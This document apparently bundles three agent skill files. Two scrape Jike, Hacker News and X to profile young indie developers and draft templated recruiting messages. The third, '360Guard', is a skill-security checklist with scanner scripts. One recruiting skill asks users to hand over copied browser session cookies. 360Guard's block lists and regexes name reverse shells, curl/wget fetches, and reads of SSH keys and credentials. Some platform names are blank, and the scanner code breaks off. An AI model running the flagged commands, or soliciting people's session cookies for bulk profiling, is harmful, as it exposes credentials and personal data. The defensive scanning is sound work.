@clawhub-robinc913-067585b106
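Scout vibecoding entrepreneur talent on the Jike platform. Each…
---
name: jike-talent-hunter
description: Scout vibecoding entrepreneur talent on the Jike platform. Each…
---
# Jike Talent Scouting
## Task Goal
Each day, find 15 young people on the Jike platform who fit the profile:
- Can program with AI tools (vibecoding)
- Have an entrepreneurial spirit
- Are able to build products independently
## Talent Pool
**Storage location**: `~/.openclaw/workspace-test/memory/talent-pool.json`
Before each run, read the talent pool first and check who is already in it, to avoid duplicates.
**Data structure**: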
```json
{
"candidates": [
{
"jikeId": "用户ID",
"postUrl": "帖子链接",
"profileUrl": "个人主页链接",
"matchedReason": "为什么匹配",
"foundDate": "2026-03-19"
}
]
}
```
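## Workflow
### Step 1: Take over the browser and log in to Jike
1. Use the `browser` tool to take over the browser: `browser(action=start, profile="openclaw")`
2. Navigate to Jike: https://web.okjike.com
3. If the user is not logged in, prompt the user to scan the QR code to log in
4. Wait for the user to finish logging in, then continue to the next step
### Step 2: Read the talent pool to check for duplicates
1. Read `~/.openclaw/workspace-test/memory/talent-pool.json`
2. Extract the list of jikeId values already recorded
### Step 3: Search for target users
When searching or browsing on Jike, use these keyword combinations:
- "vibe coding" / "vibecoding" / "AI编程" (AI programming)
- "独立开发" (indie development) / "个人产品" (personal product) / "自己做产品" (building my own product)
- "创业" (startup) / "副业" (side business) / "做自己的产品" (making my own product)
- "product hunt" / "indie hacker"
### Step 4: Verify the match
For each potential candidate, review their:
1. **Posts** - confirm there is vibecoding practice, startup sharing, product launches, or similar content
2. **Personal profile** - confirm the person is young and has experience building products independently
Criteria (any one is sufficient):
- A post mentions developing a product with AI tools and launching it
- Shares the process and results of building their own product
- Has sustained output related to startups or product building
### Step 5: Record the results
For each confirmed match, append to the talent pool:
- jikeId: the user's ID on Jike
- postUrl: link to the corresponding post
- profileUrl: link to the personal profile page
- matchedReason: brief explanation of why they match
- foundDate: today's date (YYYY-MM-DD format)
### Step 6: Meet the quota
Make sure 15 non-duplicate candidates have been found for the day before finishing.
## Output Format
When the task is complete, report:
1. Number of people found in this run
2. Total number of people in the talent pool
3. List of newly added people (jikeId + post link)
## Notes
- Always check for duplicates before recording, to avoid duplicate entries
- Every candidate must have a corresponding post link as verification evidence
- If 15 people cannot be found that day, widen the search scope or change keywords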
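Automatically discover and precisely recruit vibe coding founders. Use when: you need to mine tech communities (Jike, , Hacker News, X/Twitter, etc.) for young makers who have a geek spirit, program with AI tools and are building a startup, and to generate personalized recruiting DMs.
---
name: maker-hunter-v2
description: Automatically discover and precisely recruit vibe coding founders. Use when: you need to mine tech communities (Jike, , Hacker News, X/Twitter, etc.) for young makers who have a geek spirit, program with AI tools and are building a startup, and to generate personalized recruiting DMs.
---
# Maker Hunter V2
An automation tool for precisely discovering and recruiting vibe coding founders.
## 1. Target Persona
**Core traits**:
- Geek spirit: passionate about technology, enjoys tinkering with new tools
- Vibe Coding: proficient with AI tools (Cursor, Windsurf, Claude Code, etc.) for assisted programming
- Entrepreneurial: building their own product, with business sense or an already launched product
- Young mindset: open-minded, willing to try new paradigms
**Behavioral keywords**:
- #buildinpublic / #vibecoding / #indiehacker / #harness engineering
- 独立开发 (indie development) / Solopreneur / Bootstrap
- AI 编程 (AI programming) / Prompt Engineering / Agent
- MVP / 产品思维 (product thinking) / 商业化 (commercialization)
**Exclusion traits**:
- Pure employee mindset, no personal projects
- HR accounts that only post job ads
- Marketing accounts promoting their own products
- **Executives of well-known companies (CEO/CTO/VP, etc.)** - these people are already successful and are not the target group
- Match score below 70%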
---
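## 2. Daily Task Goal
| Platform | Minimum requirement |
|------|----------|
| **Total** | **20 candidates with match score >= 70%** |
| Jike | Login required |
| Hacker News | API available |
| X/Twitter | Login required |
**Rules:**
- Match score < 70% → eliminated immediately, not counted toward the 20
- Executives (CEO/CTO/VP, etc.) → eliminated immediately, not counted toward the 20
- If there are fewer than 20, keep scraping until the quota is filled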
---
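## 3. Platform Strategy and Scraping Methods
**Browser notes:**
- Use the Chrome browser (the system has detected `/Applications/Google Chrome.app`)
- Use the `browser` tool to control the browser
### Chinese platforms
| Platform | Priority | Scraping method | Authorization |
|------|--------|----------|----------|
| **Jike** | P0 | Browser (Chrome) | Login required |
### Foreign platforms
| Platform | Priority | Scraping method | Authorization |
|------|--------|----------|----------|
| **Hacker News** | P0 | API | No login required |
| **X/Twitter** | P1 | Browser (Chrome) | Login required |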
---
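## 4. User Profile Review Process (Important!)
**Look not only at the post, but also at the user's profile page and post history!**
### Review steps
1. **Find a target post** → identify potential candidates from posts that match the keywords
2. **Visit the user's profile** → click the author link to open their profile page
3. **Browse post history** → read the most recent 5-10 posts
4. **Overall judgment** → decide from the history whether they fit the target persona
### Criteria
**Qualifies**:
- Post history repeatedly mentions building their own product or project
- Has product links, GitHub, or work in progress
- Repeatedly takes part in vibe coding and AI programming discussions
- Shares about indie development or startups
**Does not qualify**:
- Only reposts or copies content, no original work
- Purely ranting or complaining posts
- Only posts job ads or job-seeking posts
- Marketing or promotional accounts
- **Known company executives (CEO/CTO/COO/VP/Founder, etc.)** - these people are already successful and do not fit the indie developer persona
### Executive check (Important!)
Every candidate must be checked for being an executive of a well-known company:
1. **Check the profile bio** - does it contain titles such as CEO, CTO, Founder, Co-founder
2. **Search social media** - check LinkedIn, Twitter, etc. for company rank information
3. **Check post history** - do they repeatedly mention their startup success, company size, etc.
**If the person is an executive, skip them and do not add them to the candidate list**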
---
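## 5. Daily Task Execution
### Goal
- **China region: find 10 people on Jike**
- **Foreign region: find 10 people on Hacker News + X/Twitter**
- **Total: 20 people**
### Execution flow (serial)
```
[Step 1: China region]
1. Read memory/founders.json to get the historical list
2. Read memory/daily.json to get today's processed entries
3. Immediately open the browser and have the user log in to Jike
4. After the user has logged in, scrape Jike
5. Filter: eliminate match score <70%, eliminate executives
6. Keep a running count; move to the next step once it reaches 10
[Step 2: Foreign region]
7. Have the user log in to X/Twitter
8. After the user has logged in, scrape Hacker News + X/Twitter
9. Filter: eliminate match score <70%, eliminate executives
10. Keep a running count; move to the next step once it reaches 10
[Step 3: Output]
11. Output the full candidate list (20 people) in the chat window
```
### Browser login flow
**[Step 1] First open the Jike login page**
```
1. Use the browser tool to open https://m.okjike.com/login
2. Prompt the user: "Please log in to Jike"
3. Wait for the user to finish logging in
4. Start scraping Jike after login succeeds
```
**[Step 2] Then open the X/Twitter login page**
```
1. Use the browser tool to open https://x.com/login
2. Prompt the user: "Please log in to X/Twitter"
3. Wait for the user to finish logging in
4. Start scraping after login succeeds
```
### Output requirements
When the task is complete, output the full list of 20 people in the chat window:
- China region: 10 people (Jike)
- Foreign region: 10 people (Hacker News + X/Twitter)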
---
```javascript
// ...
    foreign: foreignCandidates.slice(0, FOREIGN_TARGET)
  };
}
```
---
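## 6. Deduplication
- **Dedup key**: the `platform + username` combination is unique
- **History store**: memory/founders.json holds all historical candidates
- **Today's store**: memory/daily.json holds today's task results
### Dedup check implementation
```javascript
const fs = require('fs');

// Load the historical records and today's records
const founders = JSON.parse(fs.readFileSync('memory/founders.json', 'utf8'));
const daily = JSON.parse(fs.readFileSync('memory/daily.json', 'utf8'));

// Build a Set of the keys that already exist
const seenKeys = new Set([
  ...founders.candidates.map(c => `${c.platform}:${c.username}`),
  ...daily.candidates.map(c => `${c.platform}:${c.username}`)
]);

// Return true when this candidate (platform + username) is already recorded
function isDuplicate({ platform, username }) {
  // Build the dedup key for the current candidate
  const dedupKey = `${platform}:${username}`;
  if (seenKeys.has(dedupKey)) {
    console.log(`跳过重复: ${dedupKey}`);
    return true;
  }
  return false;
}
```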
---
## 7. Output Format (Important!)
### Chinese candidates (DM in Chinese)
```json
{
"region": "china",
"platform": "即刻",
"user_id": "12345678",
"username": "用户的即刻昵称",
"profile_url": "https://m.okjike.com/users/12345678",
"post_url": "https://m.okjike.com/posts/xxx",
"post_title": "帖子标题",
"match_score": 0.85,
"profile_summary": "用户在主页的简介(如果有)",
"history_review": "审核历史帖子后的总结,说明为何符合条件",
"dm_content": "Hi {username},看到你在即刻的帖子《{post_title}》{共鸣句}。\n\n{具体评价}。\n\n我们正在做一个___社区/项目,感觉你的___经历很适合一起聊聊。有兴趣可以加个微信或回复这封邮件。\n\n期待交流!"
}
```
### Foreign candidates (DM in English)
```json
{
"region": "foreign",
"platform": "",
"user_id": "user123",
"username": "user123",
"profile_url": "https://www..com/user/user123",
"post_url": "https://www..com/r/indiehackers/comments/xxx",
"post_title": "Post Title",
"match_score": 0.85,
"profile_summary": "User's bio if available",
"history_review": "Summary of profile review, explaining why they match",
"dm_content": "Hi {username}, saw your post on {platform} - \"{post_title}\". {Resonance sentence}.\n\n{your specific observation}. {highlight quote}.\n\nWe're building a ___ community/project and think your ___ experience would be a great fit. Happy to chat if you're interested.\n\nLooking forward to connecting!"
}
```
### DM generation rules
**Chinese template (Jike)**:
```
Hi {username},看到你在{平台}的帖子《{post_title}》{共鸣句}。
{具体评价},{亮点引用}。
我们正在做一个面向独立开发者的社区/项目,感觉你的{经历}很适合一起聊聊。有兴趣可以加个微信或者回复这封邮件。
期待交流!
```
**English template (Hacker News//X)**:
```
Hi {username}, saw your post on {platform} - "{post_title}". {Resonance sentence}.
{your specific observation}. {highlight quote}.
We're building a community for indie developers and think your {experience} would be a great fit. Happy to chat if you're interested.
Looking forward to connecting!
```
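**Resonance phrase library**:
- Chinese: 很有共鸣、这个思路很棒、太同频了、很有启发
- English: Really resonated with this, Great approach, Totally in sync, This is inspiring
**Key points**:
- Jike users → write the DM in Chinese
- Foreign platform users → write the DM in English
- The DM must mention specific content from the post, to show that it was read carefully
- Customize the DM based on the user's post history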
---
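## 8. Output Requirements (Important!)
**Every task run must also output the full candidate list to the chat window!**
### Output requirements
- Output in the chat window immediately after the task completes
- Show complete information for all 20 candidates
- Each candidate includes: platform, username, post link, DM content, match score
- Candidates with match score < 70% are not shown (already eliminated)
### Output format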
```
=== 今日候选人 ===
🇨🇳 中国区(即刻)- X/10人
1. @用户名
平台:即刻
帖子:https://...
私信:[中文私信内容]
匹配度:XX%
🌍 外国区 (Hacker News / X/Twitter) - X/10人
1. @用户名
平台:Hacker News
帖子:https://...
私信:[英文私信内容]
匹配度:XX%
```
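### Output requirements
- The full list must be shown after every run
- DM content must be shown in full (do not abbreviate)
- Chinese for the China region, English for the foreign region
- Include the match score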
---
## 8. Memory System
### File structure
```
~/.config/openclaw/maker-hunter/
├── credentials.json       # platform credentials
└── memory/
    ├── founders.json      # historical candidate store
    └── daily.json         # today's task record
```
### founders.json format
```json
{
"version": 1,
"updated_at": "2026-03-18T10:00:00Z",
"candidates": [
{
"region": "china",
"platform": "即刻",
"user_id": "12345678",
"username": "用户昵称",
"profile_url": "https://m.okjike.com/users/12345678",
"found_at": "2026-03-18",
"post_url": "https://m.okjike.com/posts/xxx"
}
]
}
```
### daily.json format
```json
{
"date": "2026-03-18",
"target_china": 10,
"target_foreign": 10,
"found_china": 10,
"found_foreign": 10,
"candidates": [...]
}
```
---
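## 9. Platform Scraping Details
### Jike (P0 - cookie required)
**Status**: requires the user to log in and then provide the cookie
**Login flow**:
```
1. Log in to Jike in the browser
2. Open developer tools (F12) → Application → Cookies
3. Copy the cookie value and provide it to me
```
**Keywords**:
- 独立开发 (indie development), AI 编程 (AI programming), vibe coding, 创业 (startup), 产品思维 (product thinking)
### Hacker News (P0)
**Endpoint**: `https://hacker-news.firebaseio.com/v0/`
**Scraping logic**:
1. Get the Top Stories ID list (`topstories.json`)
2. Take the first 50 and fetch their details (`item/{id}.json`)
3. Filter for posts that match the keywords
**Keywords**: vibe coding, AI coding, indie hacker, build in public, startup
### (P0)
**Endpoint**: `https://www..com/r/{sub}/new.json`
**Target subs**:
- r/indieweb
- r/startups
- r/indiehackers
**Keywords**: vibe coding, AI coding, indie hacker, solo founder, MVP, launch
### X/Twitter (P1 - browser login required)
**Status**: scraping is only possible after the user logs in
**Login flow**:
```
1. Use the browser tool to open https://x.com/login
2. The user scans the QR code or enters account and password to log in
3. After login succeeds, search: build in public indie hacker vibe coding
```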
---
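## 10. Scoring
A match_score (0-1) is computed for each candidate:
| Factor | Weight | Description |
|------|------|------|
| Keyword match | 0.3 | Number of target keywords in the post |
| Profile review | 0.4 | Whether the profile bio fits |
| Post history review | 0.3 | Whether the post history fits the target persona |
Only scores > 0.7 are output.
---
## 11. Run Command
Run the daily task manually:
```bash
# Run the script directly
node ~/.npm-global/lib/node_modules/openclaw/skills/maker-hunter-v2/scripts/hunter.cjs
```
On first use, create the memory directory: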
```bash
mkdir -p ~/.config/openclaw/maker-hunter/memory
```
FILE:references/dm-guide.md
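# DM Template Reference
## High-conversion template structure
```
Hi {username},
{opening resonance - based on the post content}
{specific comment - citing details from the post}
{value offered - what we do and why it suits them}
{call to action - a concrete next step}
Looking forward to chatting!
```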
## Template variants
### Variant 1: Product-oriented
```
Hi {username},看到你的 {post_title},很有共鸣!
你现在在做 {产品/项目类型},其实我们也在做一个类似的事情。我们发现 {痛点},
感觉你的经验可以帮到我们。
如果你有兴趣,可以约个时间聊聊,大家交个朋友。
```
### Variant 2: Technology-oriented
```
Hi {username},你在 {post_title} 里提到的 {技术点} 很有趣!
我们最近在折腾 {相关技术},看到你在这一块的探索很想认识一下。
有空的话可以交流一下?
```
### Variant 3: Community-oriented
```
Hi {username},看到你在 {platform} 的分享,感觉你是一个很棒的 maker!
我们在构建一个 {社区定位} 的社群,聚集了一批 {目标人群}。
你的背景很适合这个圈子,有没有兴趣加入?
```
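## Platform customization
| Platform | Form of address | Tone |
|------|----------|------|
| Reddit | Address by username | Slightly casual |
| DEV.to | @username | Friendly, technical |
| V2EX | "兄dei" / "兄弟" ("bro") | Warm |
| Juejin (掘金) | "掘友" (fellow Juejin user) | Friendly |
## Call-to-action examples
- "可以加个微信聊聊吗?" (Can we connect on WeChat and chat?)
- "有空可以约个 coffee chat" (Let's set up a coffee chat when you have time)
- "回复这封邮件就行" (Just reply to this email)
- "我在 Slack/Discord 社区,等你" (I'm in the Slack/Discord community, see you there)
- "拉你进我们的开发者群" (I'll add you to our developer group)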
---
# Platform Configuration Details
## V2EX
Nodes:
- `/go/startup` - Startups
- `/go/career` - Careers
- `/go/programmer` - Programmers
Getting the cookie:
1. Log in to V2EX
2. F12 → Application → Cookies → v2ex.com
3. Copy the cookie value
## Juejin (稀土掘金)
Getting the cookie:
1. Log in to Juejin
2. F12 → Application → Cookies → juejin.cn
3. Copy the cookie
---
# Keyword Expansion
## Target keywords (score bonus)
### Tool-related
- cursor, windsurf, claude code, bolt, v0, Lovable
- GitHub Copilot, Amazon CodeWhisperer
- LLM, GPT, Claude, Gemini
- AI coding, AI programming
### Startup-related
- indie hacker, solopreneur, bootstrap
- build in public, launched, shipping
- MVP, prototype, iterate
- revenue, monetize, pricing
### Community-related
- maker, creator, founder
- startup, bootstrapped
- #buildinpublic, #vibecoding
## Exclusion keywords (score penalty)
- 招聘 (recruiting), hiring, job, 工作 (work)
- 薪资 (pay), salary, 待遇 (compensation)
- 面试 (interview), interview
- 培训 (training), 课程 (courses), 付费 (paid)
- 营销号 (marketing account), 推广 (promotion, soft advertising)
360-degree comprehensive security review Skill. Use before installing any Skill from ClawHub, GitHub, or other sources. Performs full security scans includin...
---
name: 360Guard
description: 360-degree comprehensive security review Skill. Use before installing any Skill from ClawHub, GitHub, or other sources. Performs full security scans including all Skill Vetter checks plus extended system/privacy/behavior checks and automated scanning scripts. Supports static analysis, behavior detection, dependency auditing.
---
# 360Guard 🛡️
> 360-degree comprehensive security review — Like antivirus for your Skills
## 1. When to Use
- Before installing any Skill from ClawHub
- Before installing any Skill from GitHub or other sources
- When evaluating code shared by other Agents
- Any time you're asked to install unknown code
- Periodic audit of installed Skills (recommended monthly)
- Before running high-risk Skills for second verification
## 2. Core Principles
```
┌─────────────────────────────────────────────────────────────┐
│ 🛑 Security Layer Priority │
├─────────────────────────────────────────────────────────────┤
│ ⛔ EXTREME → Absolutely refuse to install │
│ 🔴 HIGH → Requires human approval │
│ 🟡 MEDIUM → Full code review + limited permissions │
│ 🟢 LOW → Basic review OK │
└─────────────────────────────────────────────────────────────┘
```
## 3. Security Checklist
### 3.1 Base Red Flags (from Skill Vetter)
```
🚨 Reject immediately if you see:
────────────────────────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
────────────────────────────────────────────────────────────
```
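The "base64 decode" and "obfuscated code (compressed, encoded, minified)" flags above can be checked per line rather than by grepping for the word `base64`. The following is an added example, not 360Guard code; the 500-character and 4.5-bit thresholds and the sample source are assumptions constructed for illustration.

```javascript
// Shannon entropy in bits per character; random base64 scores far higher
// than identifiers or file paths of the same length.
function shannonEntropy(str) {
  const chars = Array.from(str);
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / chars.length;
    h -= p * Math.log2(p);
  }
  return h;
}

const BASE64_RUN = /[A-Za-z0-9+\/]{40,}={0,2}/g;               // long base64-alphabet run
const HEX_RUN = /(?:\\x[0-9a-fA-F]{2}){8,}|\b[0-9a-fA-F]{64,}\b/; // \xNN chains or long hex
const DECODE_CALL =
  /\batob\s*\(|Buffer\.from\s*\([^)]*['"]base64['"]|b64decode|base64\s+(-d|--decode|-D)\b/;

// Scan source text line by line; returns [{ line, issue }] with 1-based lines.
function findObfuscation(source, opts = {}) {
  const maxLineLength = opts.maxLineLength || 500; // assumed threshold
  const minEntropy = opts.minEntropy || 4.5;       // assumed threshold
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    const line = i + 1;
    if (text.length > maxLineLength) {
      findings.push({ line, issue: 'very long line (minified or packed)' });
    }
    if (DECODE_CALL.test(text)) findings.push({ line, issue: 'base64 decode call' });
    if (HEX_RUN.test(text)) findings.push({ line, issue: 'hex-escaped blob' });
    // Entropy separates encoded blobs from long paths that share the alphabet.
    const runs = text.match(BASE64_RUN) || [];
    if (runs.some(run => shannonEntropy(run) >= minEntropy)) {
      findings.push({ line, issue: 'high-entropy base64-like blob' });
    }
  });
  return findings;
}

// Constructed sample: line 1 is a benign long path, lines 2-5 each trip one check.
const SAMPLE_SOURCE = [
  "const helper = require('./modules/openclaw/skills/example/scripts/scanner');",
  "const blob = 'k9Xz2LmQ7vB4nR1tYc8WpE5hJ0sUaG3dFoI6yNbTqHwZxVCr';",
  "run(Buffer.from(blob, 'base64').toString());",
  "const s = '\\x68\\x65\\x6c\\x6c\\x6f\\x20\\x77\\x6f\\x72\\x6c\\x64';",
  'var a=1;'.repeat(80)
].join('\n');

for (const f of findObfuscation(SAMPLE_SOURCE)) {
  console.log(`line ${f.line}: ${f.issue}`);
}
```

A hit is a reason to read the line, not a verdict: bundled assets and lockfile hashes also score high.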
### 3.2 Extended Red Flags (New)
#### 3.2.1 Persistence & Auto-start
```
🔴 Persistence check:
• Creates cron job / systemd service
• Modifies ~/.ssh/authorized_keys
• Writes to /etc/hosts
• Adds Login Items / Startup Items
• Modifies .bashrc / .zshrc / profile
• Registers LaunchAgent (macOS)
• Installs systemd user service
```
#### 3.2.2 Monitoring & Eavesdropping
```
🔴 Monitoring permissions check:
• Requests screen capture/recording (screencapture)
• Requests audio recording permission
• Keyloggers
• Accesses microphone/camera
• File system monitoring (fswatch/inotify)
```
#### 3.2.3 Data & Privacy
```
🔴 Data theft check:
• Reads clipboard (pbpaste)
• Reads environment variables (especially API_, SECRET, TOKEN)
• Accesses browser history/bookmarks
• Accesses macOS Keychain
• Accesses iMessage/SMS
• Accesses contacts/calendar
• Accesses photo library
```
#### 3.2.4 Network & Communication
```
🔴 Network anomaly check:
• Initiates reverse shell (nc -e / bash -i)
• Uses Tor proxy
• DNS queries to suspicious domains
• WebSocket long connections
• IRC connections
• Non-standard ports (>65535 or <1024 unusual)
• Hardcoded IP addresses (non-local)
```
#### 3.2.5 Code Execution (Advanced)
```
🔴 Dynamic execution check:
• Dynamic import (importlib.import_module)
• __import__() dynamic loading
• compile() dynamic compilation
• xmlrpc / jsonrpc remote calls
• pickle / yaml / marshal deserialization
• exec() / eval() any string
• subprocess shell=True
```
#### 3.2.6 File System
```
🟡 File operation check:
• Writes to executable paths outside /tmp
• Modifies /usr/local/bin
• Writes .dmg/.pkg installers
• Creates .hidden files/directories
• File permission modification (chmod +x)
• Symbolic links (pointing external)
• Contains binary files (.so/.dylib/.exe/.bin)
```
#### 3.2.7 Dependencies & Supply Chain
```
🟡 Supply chain check:
• Dependency version range too wide (>1.0.0 not ^1.0.0)
• Dependencies from private/unknown sources
• Dependencies on deprecated packages
• Silent additional dependency downloads
• References other unvetted Skills
• Uses git submodule (may point to malicious repo)
```
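The supply chain checks above (version ranges that are too wide, dependencies from non-registry sources, silent extra downloads) can be evaluated directly on a parsed `package.json`. This is an added example, not 360Guard code; the sample manifest, package names and issue labels are constructed for illustration.

```javascript
// Lifecycle scripts that npm can run automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Classify one dependency spec string; returns a list of issue labels.
function classifySpec(spec) {
  const s = String(spec).trim();
  if (s === '' || s === '*' || s === 'x' || s === 'latest') {
    return ['unbounded version'];
  }
  if (/^(file:|link:|~?\/|\.\.?\/)/.test(s)) {
    return ['local path source'];
  }
  if (/^(git(\+(ssh|https?|file))?:|github:|gitlab:|bitbucket:)/i.test(s) ||
      /^[\w.-]+\/[\w.-]+(#.*)?$/.test(s)) {
    // Git URL or "owner/repo" shorthand: code comes from outside the registry.
    const pinned = /#[0-9a-f]{40}$/i.test(s);
    return [pinned ? 'git source (pinned commit)' : 'git source (unpinned)'];
  }
  if (/^https?:\/\//i.test(s)) {
    return ['remote tarball URL'];
  }
  if (/^>=?\s*\d/.test(s) && !s.includes('<')) {
    return ['open-ended range']; // e.g. ">1.0.0" instead of "^1.0.0"
  }
  return [];
}

// Audit a parsed package.json object; returns [{ where, spec, issue }].
function auditPackageJson(pkg) {
  const findings = [];
  const sections = ['dependencies', 'devDependencies',
                    'optionalDependencies', 'peerDependencies'];
  for (const section of sections) {
    for (const [name, spec] of Object.entries(pkg[section] || {})) {
      for (const issue of classifySpec(spec)) {
        findings.push({ where: `${section}.${name}`, spec: String(spec), issue });
      }
    }
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (typeof cmd !== 'string') continue;
    // An install hook runs with the installing user's privileges; one that
    // downloads or evaluates something is the "silent download" case.
    const fetches =
      /\b(curl|wget|fetch|node\s+-e|bash\s+-c|sh\s+-c)\b|https?:\/\//i.test(cmd);
    findings.push({
      where: `scripts.${hook}`,
      spec: cmd,
      issue: fetches ? 'install hook fetches or evals code' : 'install hook present'
    });
  }
  return findings;
}

// Constructed sample manifest (hypothetical package names and URLs).
const SAMPLE_PKG = {
  name: 'example-skill',
  dependencies: {
    'left-pad': '^1.3.0',        // caret range: not flagged
    'chalk': '>4.0.0',
    'lodash': '*',
    'helper': 'someuser/helper',
    'pinned': 'git+https://example.com/x/pinned.git#0123456789abcdef0123456789abcdef01234567',
    'blob': 'https://example.com/pkg.tgz'
  },
  devDependencies: { 'local-tool': 'file:../tool' },
  scripts: { postinstall: 'curl -s https://example.com/setup.sh | sh', test: 'node test.js' }
};

for (const f of auditPackageJson(SAMPLE_PKG)) {
  console.log(`${f.issue}: ${f.where} = ${f.spec}`);
}
```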
#### 3.2.8 Social Engineering
```
🟡 Social engineering check:
• Mimics popular Skill names (e.g., "github", "weather-ai")
• README overpromises ("one-click to do everything...")
• No source code, only compiled binaries
• Author has no history
• Downloads vs stars ratio suspicious (fake reviews)
```
---
## 4. Risk Classification
| Risk Level | Example Checks | Action |
|------------|----------------|--------|
| 🟢 LOW | Text processing, weather, note formatting | Basic review, OK to install |
| 🟡 MEDIUM | File I/O, browser control, API calls | Full review + limited permissions |
| 🔴 HIGH | Credential access, Keychain, network requests | Human approval + sandbox test |
| ⛔ EXTREME | Persistence, root access, keylogging, reverse shell | **Refuse** |
---
## 5. Trust Hierarchy
| Source | Review Level | Recommendation |
|--------|--------------|----------------|
| Official OpenClaw Skills | Low (still review) | Basic check |
| High-star Repo (1000+) | Medium | Standard check |
| Known Authors | Medium | Standard check |
| Unknown Sources | High | Full check |
| Requests credentials | Extreme | **Refuse** |
| Modifies system files | Extreme | **Refuse** |
---
## 6. Automated Scanning Scripts
### 6.1 Quick Scan (quick-scan.sh)
```bash
#!/bin/bash
# Usage: ./quick-scan.sh /path/to/skill
# Output: Quick risk assessment report
SKILL_PATH="$1"
echo "🔍 360Guard Quick Scan: $SKILL_PATH"
echo "================================"
# Check dangerous functions
echo -e "\n📡 Network request check:"
grep -r "curl\|wget\|fetch\|http\.\|https\.\|socket" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" | head -5
# Check sensitive file access
echo -e "\n🔑 Sensitive path check:"
grep -r "~/.ssh\|~/.aws\|~/.config\|/etc/hosts\|authorized_keys" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py"
# Check dangerous commands
echo -e "\n⚠️ Dangerous command check:"
grep -r "eval\|exec\|shell=True\|base64 -d\|openssl" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py"
echo -e "\n✅ Quick scan complete"
```
### 6.2 Full Scan (full-scan.sh)
```bash
#!/bin/bash
# Usage: ./full-scan.sh /path/to/skill
# Output: Complete security assessment report
SKILL_PATH="$1"
REPORT="$SKILL_PATH/360guard-report.txt"
echo "🛡️ 360Guard Full Scan: $SKILL_PATH" | tee "$REPORT"
echo "========================================" | tee -a "$REPORT"
# 1. File structure check
echo -e "\n📁 File structure:" | tee -a "$REPORT"
find "$SKILL_PATH" -type f | head -20 | tee -a "$REPORT"
# 2. Dangerous function scan
echo -e "\n⚠️ Dangerous function scan:" | tee -a "$REPORT"
for pattern in "eval(" "exec(" "shell=True" "base64" "subprocess" "importlib" "__import__" "pickle" "yaml.load" "xmlrpc" "socket.create_connection"; do
result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " ❌ Found: $pattern" | tee -a "$REPORT"
echo "$result" | head -3 | tee -a "$REPORT"
fi
done
# 3. Sensitive path scan
echo -e "\n🔑 Sensitive path scan:" | tee -a "$REPORT"
for pattern in "~/.ssh" "~/.aws" "~/.config" "/etc/hosts" "authorized_keys" "keychain" "credentials" ".env"; do
result=$(grep -r "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " ⚠️ Warning: $pattern" | tee -a "$REPORT"
fi
done
# 4. Network request scan
echo -e "\n🌐 Network request scan:" | tee -a "$REPORT"
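# grep -r prefixes each match with "path:", so comment lines are filtered after that prefix
grep -r "http://\|https://\|wget\|curl\|fetch" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" | grep -v '^[^:]*:[[:space:]]*#' | head -10 | tee -a "$REPORT"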
# 5. Persistence check
echo -e "\n⏰ Persistence check:" | tee -a "$REPORT"
for pattern in "cron" "systemd" "launchd" "login item" "startup" "autostart"; do
result=$(grep -ri "$pattern" "$SKILL_PATH" --include="*.sh" --include="*.js" --include="*.py" 2>/dev/null)
if [ -n "$result" ]; then
echo " 🔴 High risk: $pattern" | tee -a "$REPORT"
fi
done
# 6. Dependency check
echo -e "\n📦 Dependency check:" | tee -a "$REPORT"
if [ -f "$SKILL_PATH/package.json" ]; then
  grep -E "dependencies|devDependencies" -A 20 "$SKILL_PATH/package.json" | tee -a "$REPORT"
fi
if [ -f "$SKILL_PATH/requirements.txt" ]; then
cat "$SKILL_PATH/requirements.txt" | tee -a "$REPORT"
fi
if [ -f "$SKILL_PATH/package.yaml" ]; then
cat "$SKILL_PATH/package.yaml" | tee -a "$REPORT"
fi
# 7. Binary file check
echo -e "\n💾 Binary file check:" | tee -a "$REPORT"
find "$SKILL_PATH" -type f \( -name "*.so" -o -name "*.dylib" -o -name "*.exe" -o -name "*.bin" -o -name "*.dll" \) 2>/dev/null | tee -a "$REPORT"
echo -e "\n========================================" | tee -a "$REPORT"
echo "✅ Full scan complete, report saved to: $REPORT"
```
### 6.3 Node.js Scanner (scanner.js)
```javascript
#!/usr/bin/env node
/**
 * 360Guard Node.js Scanner
 * Usage: node scanner.js /path/to/skill
 */
const fs = require('fs');
const path = require('path');

// Regex signatures grouped by risk level; each is tested against whole file content
const DANGER_PATTERNS = {
  CRITICAL: [
    { pattern: /eval\s*\(/, name: 'eval() execution' },
    { pattern: /exec\s*\(/, name: 'exec() execution' },
    { pattern: /shell\s*=\s*true/i, name: 'subprocess shell=True' },
    { pattern: /base64.*decode/i, name: 'base64 decode' },
    { pattern: /pickle\.load/i, name: 'pickle deserialization' },
    { pattern: /yaml\.load/i, name: 'yaml deserialization' },
    { pattern: /__import__\s*\(/, name: 'dynamic import' },
    { pattern: /importlib\.import_module/i, name: 'dynamic module load' },
    { pattern: /xmlrpc/i, name: 'XML-RPC remote call' },
    { pattern: /reverse.*shell|nc\s+-e|bash\s+-i/i, name: 'reverse shell' }
  ],
  HIGH: [
    { pattern: /curl\s+/, name: 'curl request' },
    { pattern: /wget\s+/, name: 'wget download' },
    { pattern: /fetch\s*\(/, name: 'fetch request' },
    { pattern: /https?:\/\/\d{1,3}\.\d{1,3}/, name: 'direct IP connection' },
    { pattern: /process\.env/i, name: 'environment variable access' },
